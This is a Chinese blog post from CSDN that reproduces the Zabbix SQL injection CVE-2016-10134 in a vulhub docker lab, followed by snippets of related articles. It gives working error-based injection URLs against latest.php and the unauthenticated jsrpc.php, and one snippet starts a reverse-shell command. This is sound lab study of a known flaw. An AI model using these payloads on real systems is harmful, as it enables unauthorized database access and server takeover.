zabbix latest.php SQL注入漏洞(CVE-2016-10134)

最新推荐文章于 2024-07-10 08:51:49 发布
最新推荐文章于 2024-07-10 08:51:49 发布
阅读量403 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119839960
版权

漏洞简介

Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位、解决存在的各种问题。 Zabbix 2.2.14之前的版本和3.0.4之前的3.0版本中存在SQL注入漏洞。远程攻击者可借助latest.php文件中的‘toggle_ids’数组参数利用该漏洞执行任意SQL命令。

漏洞复现

访问http://your-ip:8080,用账号guest(密码为空)登录游客账户。
登录后,查看Cookie中的zbx_sessionid,复制后16位字符:
在这里插入图片描述

将这16个字符作为sid的值,访问http://your-ip:8080/latest.php?output=ajax&sid=28a92006de3803a3&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0),可见成功注入:
在这里插入图片描述

这个漏洞也可以通过jsrpc.php触发,且无需登录:http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
zabbix SQL注入漏洞CVE-2016-10134
jammny
12-04 383
漏洞详情 zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。前端页面jsrpc.php的参数profileIdx2以及后端latest.php页面中的参数toggle_ids[]存在SQL注入,攻击者可以通过此漏洞 漏洞影响 Zabbix 2.2.14之前 Zabbix 3.0~3.0.4 漏洞利用 如果可以使用guest用户进行登陆,那么可以通过账号为guest密码为空进入后台,通过抓包记住自己cookie
zabbix SQL注入漏洞CVE-2016-10134
SoulCat
01-26 7130
zabbix SQL注入漏洞CVE-2016-10134漏洞概述: zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbixlatest.php中的toggle_ids[]或jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。 漏洞版本: 2.2.x 3....
mysql中添加字段
热门推荐
m0_54850467的博客
09-11 4万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
zabbix后台RCE
weixin_44508748的博客
11-24 1293
vulhub有现成的zabbix环境 git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git cd vulhub/zabbix/CVE-2016-10134/ docker-compose up -d zabbix默认口令admin\zabbix 1.写脚本 http://1.1.1.1/zabbix/zabbix.php?action=script.edit&scriptid=4 bash -i>&
vulhubZabbix
weixin_56306210的博客
01-22 794
vulhubZabbix
zabbix latest.php SQL注入漏洞CVE-2016-10134)复现,python编写POC
wangqiao258的博客
10-04 264
环境搭建: 使用vulhub,进入对应文件夹启动环境: [root@localhost CVE-2016-10134]# cd /home/vulhub/zabbix/CVE-2016-10134/ [root@localhost CVE-2016-10134]# docker-compose up -d 查看端口: [root@localhost CVE-2016-10134]# docker ps CONTAINER ID IMAGE COMMA
[CVE-2016-10134]zabbix sql注入实测
Delphinidae
11-19 304
参考链接:vulhub 目的:熟悉和复现该漏洞做治理内部发现的漏洞 漏洞注入点:profileIdx2 漏洞路由:/jsrpc.php这个文件 漏洞环境:搭建vulhub docker环境 用brupsuite 抓包开始复现漏洞,确认漏洞是否存在,那当前用户数据用户名 user(),可见有root用户返回,证明漏洞存在。 报错注入的漏洞存在。 sql注入漏洞存在,下一步是取出关键信息,zabbix取出Admin的密码就可以控制该系统的所有主机了,那么开始取数据,通过zabbix相关信息查到登陆用户密码
zabbix-agent.tar.gz
07-28
Zabbix-Agent是一款强大的开源监控软件,它在IT基础设施管理领域占据着重要地位。"zabbix-agent.tar.gz" 是Zabbix Agent的压缩包文件,通常用于在目标系统上部署该代理服务。这个特定的版本被描述为一个修改后的采集...
Zabbix登录绕过漏洞 [CVE-2022-23131].md
07-09
Zabbix登录绕过漏洞 [CVE-2022-23131]
zabbix-release-6.0-1.el7.noarch.rpm
04-08
zabbix-release-6.0-1.el7.noarch.rpm
软件漏洞Zabbix
qq_45883910的博客
02-12 4138
Zabbix 是什么? 免费的、企业级的分布式开源、C/S架构、监控众多网络参数和服务器的软件。 Zabbix基本原理 存在的漏洞Zabbix Server trapper命令注入漏洞CVE-2020-11800) zabbix latest.php SQL注入漏洞CVE-2016-10134漏洞原理。 Zabbix Server trapper命令注入漏洞CVE-2020-11800) :在CVE-2017-2824中,其Server端 trapper command 功能存在一处代
漏洞复现--Zabbix远程代码执行漏洞CVE-2020-11800含EXP)
HengMengSec的博客
08-21 1983
漏洞复现--Zabbix远程代码执行漏洞CVE-2020-11800含EXP)
渗透测试常用方法总结
qq_53058639的博客
03-10 1331
Hadoop=HDFS(文件系统,数据存储技术相关)+ Mapreduce(数据处理),Hadoop的数据来源可以是任何形式,在处理半结构化和非结构化数据上与关系型数据库相比有更好的性能,具有更灵活的处理能力,不管任何数据形式最终会转化为key/value,key/value是基本数据单元。一般组织中很多独立安装的 Esxi 形式的私有云,或独立部署的虚拟化系统。没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。
Zabbix 远程代码执行漏洞复现(CVE-2020-11800)
m0_48520508的博客
03-08 5412
0x00简介 abbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,A
vulhub学习文档-zabbix php SQL注入漏洞
ploto_cs的博客
09-12 753
zabbix php SQL注入漏洞 一.漏洞介绍 (一)编号 CVE-2016-10134 (二)概述 zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 (三)影响版本 Zabbix 2.2.14之前的版本和3.0.4之前的3.0版本。 (四)漏洞要求 zabbix开启了guest权限。而在zabbix中,guest的默认密码为空。 二.操作步骤 (一)Vulhub ip地址:http://192.168.126.13
移动互联安全扩展要求测评项
最新发布
hakksjss的博客
07-10 1072
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
zcat /usr/share/doc/zabbix-server-mysql*/create.sql.gz | mysql -uzabbix -p zabbix这条命令什么意思
07-25
这条命令的含义是将一个压缩的SQL文件解压缩并导入到MySQL数据库中。让我逐步解释每个部分的含义: 1. `zcat /usr/share/doc/zabbix-server-mysql*/create.sql.gz`:这部分使用`zcat`命令来解压缩一个名为`create.sql.gz`的文件。`create.sql.gz`文件位于`/usr/share/doc/zabbix-server-mysql*`目录下(通配符`*`用于匹配具体的文件名)。 2. `|`:这是一个管道符号,用于将前一个命令的输出作为后一个命令的输入。 3. `mysql -uzabbix -p zabbix`:这部分使用`mysql`命令连接到MySQL数据库,并指定了用户名`zabbix`(通过`-uzabbix`参数)和数据库名`zabbix`(通过最后的参数)。`-p`选项表示需要输入密码,系统将提示您输入密码后才能继续执行命令。 因此,整个命令的目的是将压缩的SQL文件解压缩,并将其内容导入到名为`zabbix`的MySQL数据库中,使用用户名为`zabbix`的凭据进行身份验证。 请注意,执行此命令需要相应的权限和凭据才能成功连接到MySQL数据库并导入数据。确保您具有适当的权限和提供正确的凭据才能成功执行该命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值